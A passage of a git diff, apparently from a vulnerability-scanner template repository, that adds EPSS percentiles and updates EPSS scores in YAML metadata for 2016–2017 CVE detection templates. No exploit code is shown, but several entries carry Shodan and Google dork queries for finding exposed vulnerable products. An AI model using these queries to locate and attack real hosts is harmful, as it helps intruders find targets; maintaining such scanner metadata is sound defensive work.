cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96962
metadata:
max-request: 1
vendor: zabbix
diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml
index 9e84ed73be..3fbfb5f721 100644
--- a/http/cves/2016/CVE-2016-10367.yaml
+++ b/http/cves/2016/CVE-2016-10367.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01346
cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*
+ epss-percentile: 0.84443
metadata:
max-request: 1
shodan-query: title:"Opsview"
diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml
index 53baca7c05..ecb69919b3 100644
--- a/http/cves/2016/CVE-2016-10368.yaml
+++ b/http/cves/2016/CVE-2016-10368.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00179
cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*
+ epss-percentile: 0.5437
metadata:
max-request: 1
vendor: opsview
diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml
index cf3677efa5..808685577e 100644
--- a/http/cves/2016/CVE-2016-10924.yaml
+++ b/http/cves/2016/CVE-2016-10924.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2016-10924
cwe-id: CWE-22
- epss-score: 0.01018
+ epss-score: 0.01574
cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.85677
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/ebook-download"
diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml
index a6158f9135..f09e66426b 100644
--- a/http/cves/2016/CVE-2016-10940.yaml
+++ b/http/cves/2016/CVE-2016-10940.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.00841
cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.79955
metadata:
max-request: 3
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml
index a32034beef..652f02935e 100644
--- a/http/cves/2016/CVE-2016-10956.yaml
+++ b/http/cves/2016/CVE-2016-10956.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2016-10956
cwe-id: CWE-20
- epss-score: 0.01204
+ epss-score: 0.02303
cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88281
metadata:
max-request: 2
google-query: inurl:"/wp-content/plugins/mail-masta"
diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml
index 23b197fd5b..6586f1cad2 100644
--- a/http/cves/2016/CVE-2016-10960.yaml
+++ b/http/cves/2016/CVE-2016-10960.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-20
epss-score: 0.01127
cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:*
+ epss-percentile: 0.82845
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/wsecure"
@@ -24,7 +25,6 @@ info:
vendor: joomlaserviceprovider
product: wsecure
tags: cve,cve2016,wordpress,wp-plugin,rce
-
variables:
name: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml
index d7fe96ed6b..742e74115d 100644
--- a/http/cves/2016/CVE-2016-10973.yaml
+++ b/http/cves/2016/CVE-2016-10973.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00177
cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.54186
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml
index 8d6c6805b2..da7364a9a1 100644
--- a/http/cves/2016/CVE-2016-10993.yaml
+++ b/http/cves/2016/CVE-2016-10993.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00245
cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.61781
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml
index 6d40e10c27..953d3a48c7 100644
--- a/http/cves/2016/CVE-2016-1555.yaml
+++ b/http/cves/2016/CVE-2016-1555.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-1555
cwe-id: CWE-77
- epss-score: 0.97385
+ epss-score: 0.97375
cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99856
metadata:
max-request: 1
vendor: netgear
diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml
index 81a67bc3de..64376ca045 100644
--- a/http/cves/2016/CVE-2016-2389.yaml
+++ b/http/cves/2016/CVE-2016-2389.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.24589
cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*
+ epss-percentile: 0.96019
metadata:
max-request: 1
shodan-query: http.favicon.hash:-266008933
diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml
index 8a6410c511..591133ab7c 100644
--- a/http/cves/2016/CVE-2016-3081.yaml
+++ b/http/cves/2016/CVE-2016-3081.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-77
epss-score: 0.97524
cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99979
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml
index 96664a0b13..5963d56d19 100644
--- a/http/cves/2016/CVE-2016-3088.yaml
+++ b/http/cves/2016/CVE-2016-3088.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-20
epss-score: 0.83955
cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98024
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml
index afa4cbfe17..3ecd1c1032 100644
--- a/http/cves/2016/CVE-2016-3978.yaml
+++ b/http/cves/2016/CVE-2016-3978.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00217
cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.59005
metadata:
max-request: 1
vendor: fortinet
diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml
index 23ff51f926..b518b0de45 100644
--- a/http/cves/2016/CVE-2016-4437.yaml
+++ b/http/cves/2016/CVE-2016-4437.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2016-4437
cwe-id: CWE-284
- epss-score: 0.97483
+ epss-score: 0.97507
cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99967
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml
index 0df3c0c46a..f2063b4297 100644
--- a/http/cves/2016/CVE-2016-4975.yaml
+++ b/http/cves/2016/CVE-2016-4975.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2016-4975
cwe-id: CWE-93
- epss-score: 0.00366
+ epss-score: 0.00428
cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.71207
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml
index b62d9b6141..c6a25ac2d4 100644
--- a/http/cves/2016/CVE-2016-4977.yaml
+++ b/http/cves/2016/CVE-2016-4977.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-19
epss-score: 0.03345
cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9012
metadata:
max-request: 1
vendor: pivotal
diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml
index fb3eb43ba9..3c1ed6d7a6 100644
--- a/http/cves/2016/CVE-2016-5649.yaml
+++ b/http/cves/2016/CVE-2016-5649.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-5649
cwe-id: CWE-200,CWE-319
- epss-score: 0.10584
+ epss-score: 0.15681
cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:*
+ epss-percentile: 0.95209
metadata:
max-request: 1
vendor: netgear
diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml
index bedd2a5e56..cc72ea4844 100644
--- a/http/cves/2016/CVE-2016-6195.yaml
+++ b/http/cves/2016/CVE-2016-6195.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.00284
cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
+ epss-percentile: 0.64634
metadata:
max-request: 6
shodan-query: title:"Powered By vBulletin"
diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml
index 47de0f0ac0..8a1e5608df 100644
--- a/http/cves/2016/CVE-2016-6277.yaml
+++ b/http/cves/2016/CVE-2016-6277.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-352
epss-score: 0.97471
cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99942
metadata:
max-request: 1
vendor: netgear
diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml
index cfce9fa1bf..e5a09e48ae 100644
--- a/http/cves/2016/CVE-2016-6601.yaml
+++ b/http/cves/2016/CVE-2016-6601.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2016-6601
cwe-id: CWE-22
- epss-score: 0.97521
+ epss-score: 0.97518
cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:*
+ epss-percentile: 0.99974
metadata:
max-request: 1
vendor: zohocorp
diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml
index db2bc880c1..7fbb6197e7 100644
--- a/http/cves/2016/CVE-2016-7552.yaml
+++ b/http/cves/2016/CVE-2016-7552.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-7552
cwe-id: CWE-22
- epss-score: 0.97039
+ epss-score: 0.97004
cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:*
+ epss-percentile: 0.99624
metadata:
max-request: 1
vendor: trendmicro
diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml
index 41a91c1448..f1dcd93ffc 100644
--- a/http/cves/2016/CVE-2016-7834.yaml
+++ b/http/cves/2016/CVE-2016-7834.yaml
@@ -21,6 +21,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00202
cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.57452
metadata:
max-request: 1
vendor: sony
diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml
index f57462717a..c4d77f5496 100644
--- a/http/cves/2016/CVE-2016-7981.yaml
+++ b/http/cves/2016/CVE-2016-7981.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00258
cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
+ epss-percentile: 0.62782
metadata:
max-request: 1
vendor: spip
diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml
index 0e493c6378..a803999456 100644
--- a/http/cves/2016/CVE-2016-8527.yaml
+++ b/http/cves/2016/CVE-2016-8527.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2016-8527
cwe-id: CWE-79
- epss-score: 0.00249
+ epss-score: 0.00221
cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:*
+ epss-percentile: 0.59489
metadata:
max-request: 1
vendor: hp
diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml
index dac4e960bc..fabf126a62 100644
--- a/http/cves/2017/CVE-2017-0929.yaml
+++ b/http/cves/2017/CVE-2017-0929.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-918
epss-score: 0.03588
cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90434
metadata:
max-request: 1
vendor: dnnsoftware
diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml
index 4d94a25c8a..ee5c804854 100644
--- a/http/cves/2017/CVE-2017-1000028.yaml
+++ b/http/cves/2017/CVE-2017-1000028.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97522
cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*
+ epss-percentile: 0.99977
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml
index 1bbc8eeac8..a84d31f478 100644
--- a/http/cves/2017/CVE-2017-1000029.yaml
+++ b/http/cves/2017/CVE-2017-1000029.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00387
cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
+ epss-percentile: 0.69803
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml
index 721faefdf7..5de1c7163c 100644
--- a/http/cves/2017/CVE-2017-1000163.yaml
+++ b/http/cves/2017/CVE-2017-1000163.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00151
cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.50609
metadata:
max-request: 1
vendor: phoenixframework
diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml
index 31817b86cf..4f47489d9d 100644
--- a/http/cves/2017/CVE-2017-1000170.yaml
+++ b/http/cves/2017/CVE-2017-1000170.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.73129
cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97669
metadata:
max-request: 1
vendor: jqueryfiletree_project
diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml
index 11918414a4..1ec9995271 100644
--- a/http/cves/2017/CVE-2017-1000486.yaml
+++ b/http/cves/2017/CVE-2017-1000486.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-1000486
cwe-id: CWE-326
- epss-score: 0.97108
+ epss-score: 0.96992
cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99619
metadata:
max-request: 1
vendor: primetek
diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml
index aca96fe8e0..80d7feb4fc 100644
--- a/http/cves/2017/CVE-2017-10075.yaml
+++ b/http/cves/2017/CVE-2017-10075.yaml
@@ -17,6 +17,7 @@ info:
cve-id: CVE-2017-10075
epss-score: 0.00409
cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:*
+ epss-percentile: 0.70564
metadata:
max-request: 2
google-query: inurl:"/cs/idcplg"
diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml
index e60db1cf4b..32e30ca263 100644
--- a/http/cves/2017/CVE-2017-10271.yaml
+++ b/http/cves/2017/CVE-2017-10271.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2017-10271
- epss-score: 0.97429
+ epss-score: 0.97438
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99911
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml
index f1358975ae..bd4e862694 100644
--- a/http/cves/2017/CVE-2017-10974.yaml
+++ b/http/cves/2017/CVE-2017-10974.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.96161
cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:*
+ epss-percentile: 0.99289
metadata:
max-request: 1
vendor: yaws
diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml
index d193fc2ed7..d54dce4a90 100644
--- a/http/cves/2017/CVE-2017-11165.yaml
+++ b/http/cves/2017/CVE-2017-11165.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-200
epss-score: 0.94336
cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:*
+ epss-percentile: 0.98871
metadata:
max-request: 1
shodan-query: http.title:"datataker"
diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml
index 03a027bd8b..a40a1c4a34 100644
--- a/http/cves/2017/CVE-2017-11444.yaml
+++ b/http/cves/2017/CVE-2017-11444.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-11444
cwe-id: CWE-89
- epss-score: 0.02273
+ epss-score: 0.04447
cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91351
metadata:
max-request: 1
vendor: intelliants
diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml
index fd04c59aba..c62296efa7 100644
--- a/http/cves/2017/CVE-2017-11512.yaml
+++ b/http/cves/2017/CVE-2017-11512.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97175
cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:*
+ epss-percentile: 0.99714
metadata:
max-request: 2
shodan-query: http.title:"ManageEngine"
diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml
index a5e595575b..34c1c3ddc8 100644
--- a/http/cves/2017/CVE-2017-11586.yaml
+++ b/http/cves/2017/CVE-2017-11586.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00121
cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.45569
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml
index afa81df33e..1cbaf2861e 100644
--- a/http/cves/2017/CVE-2017-11610.yaml
+++ b/http/cves/2017/CVE-2017-11610.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-11610
cwe-id: CWE-276
- epss-score: 0.9743
+ epss-score: 0.97461
cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99932
metadata:
max-request: 1
shodan-query: http.title:"Supervisor Status"
diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml
index 6bf1a2767b..dc2ecf951d 100644
--- a/http/cves/2017/CVE-2017-11629.yaml
+++ b/http/cves/2017/CVE-2017-11629.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40499
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml
index 6c830de612..1ea9ed9161 100644
--- a/http/cves/2017/CVE-2017-12138.yaml
+++ b/http/cves/2017/CVE-2017-12138.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00062
cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:*
+ epss-percentile: 0.24266
metadata:
max-request: 2
vendor: xoops
diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml
index f596d3c4d6..db499ced39 100644
--- a/http/cves/2017/CVE-2017-12149.yaml
+++ b/http/cves/2017/CVE-2017-12149.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-12149
cwe-id: CWE-502
- epss-score: 0.974
+ epss-score: 0.97292
cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9979
metadata:
max-request: 3
vendor: redhat
diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml
index a8d35a8eaf..365e607162 100644
--- a/http/cves/2017/CVE-2017-12542.yaml
+++ b/http/cves/2017/CVE-2017-12542.yaml
@@ -15,8 +15,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-12542
- epss-score: 0.97258
+ epss-score: 0.97361
cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99841
metadata:
max-request: 1
vendor: hp
diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml
index af2714d605..6684f86c9d 100644
--- a/http/cves/2017/CVE-2017-12544.yaml
+++ b/http/cves/2017/CVE-2017-12544.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.96723
cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99503
metadata:
max-request: 1
vendor: hp
diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml
index 93d59c2d8e..5bd2f1f47b 100644
--- a/http/cves/2017/CVE-2017-12583.yaml
+++ b/http/cves/2017/CVE-2017-12583.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
+ epss-percentile: 0.40499
metadata:
max-request: 1
shodan-query: http.title:"DokuWiki"
diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml
index 5e33980f7f..51841f9e8a 100644
--- a/http/cves/2017/CVE-2017-12611.yaml
+++ b/http/cves/2017/CVE-2017-12611.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-20
epss-score: 0.97358
cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.99841
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml
index 2f8a28f47a..9252b0d4a8 100644
--- a/http/cves/2017/CVE-2017-12615.yaml
+++ b/http/cves/2017/CVE-2017-12615.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-434
epss-score: 0.97499
cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99962
metadata:
max-request: 2
shodan-query: title:"Apache Tomcat"
diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml
index 15bba35a88..0460c90e4f 100644
--- a/http/cves/2017/CVE-2017-12617.yaml
+++ b/http/cves/2017/CVE-2017-12617.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.1
cve-id: "CVE-2017-12617"
cwe-id: CWE-434
- epss-score: 0.97541
+ epss-score: 0.97542
cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9999
metadata:
verified: "true"
max-request: 2
diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml
index d3145ab7a8..4041581147 100644
--- a/http/cves/2017/CVE-2017-12629.yaml
+++ b/http/cves/2017/CVE-2017-12629.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-12629
cwe-id: CWE-611
- epss-score: 0.97491
+ epss-score: 0.97452
cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99923
metadata:
max-request: 2
vendor: apache
diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml
index 86bd636b7b..bda6a918aa 100644
--- a/http/cves/2017/CVE-2017-12635.yaml
+++ b/http/cves/2017/CVE-2017-12635.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-269
epss-score: 0.97536
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99988
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml
index dfe34e0048..f23e84563f 100644
--- a/http/cves/2017/CVE-2017-12637.yaml
+++ b/http/cves/2017/CVE-2017-12637.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00648
cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:*
+ epss-percentile: 0.76701
metadata:
max-request: 1
shodan-query: http.favicon.hash:-266008933
diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml
index e543208310..964e23d790 100644
--- a/http/cves/2017/CVE-2017-12794.yaml
+++ b/http/cves/2017/CVE-2017-12794.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00219
cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*
+ epss-percentile: 0.59163
metadata:
max-request: 1
vendor: djangoproject
diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml
index 4934a266ec..ac40357f96 100644
--- a/http/cves/2017/CVE-2017-14135.yaml
+++ b/http/cves/2017/CVE-2017-14135.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-78
epss-score: 0.96679
cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99486
metadata:
max-request: 1
shodan-query: title:"Dreambox WebControl"
diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml
index b9d8e3ff74..f005c90402 100644
--- a/http/cves/2017/CVE-2017-14186.yaml
+++ b/http/cves/2017/CVE-2017-14186.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.02948
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89542
metadata:
max-request: 1
shodan-query: port:10443 http.favicon.hash:945408572
diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml
index 5c3543cffa..bcf9d8d5ca 100644
--- a/http/cves/2017/CVE-2017-14524.yaml
+++ b/http/cves/2017/CVE-2017-14524.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2017-14524
cwe-id: CWE-601
- epss-score: 0.00329
+ epss-score: 0.00258
cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:*
+ epss-percentile: 0.62785
metadata:
max-request: 1
vendor: opentext
diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml
index 3407bba7c6..ad229d6661 100644
--- a/http/cves/2017/CVE-2017-14535.yaml
+++ b/http/cves/2017/CVE-2017-14535.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-14535
cwe-id: CWE-78
- epss-score: 0.06176
+ epss-score: 0.04456
cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.91357
metadata:
max-request: 1
vendor: netfortris
diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml
index c29c76fac5..aefc911a52 100644
--- a/http/cves/2017/CVE-2017-14537.yaml
+++ b/http/cves/2017/CVE-2017-14537.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01002
cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.81748
metadata:
max-request: 2
vendor: netfortris
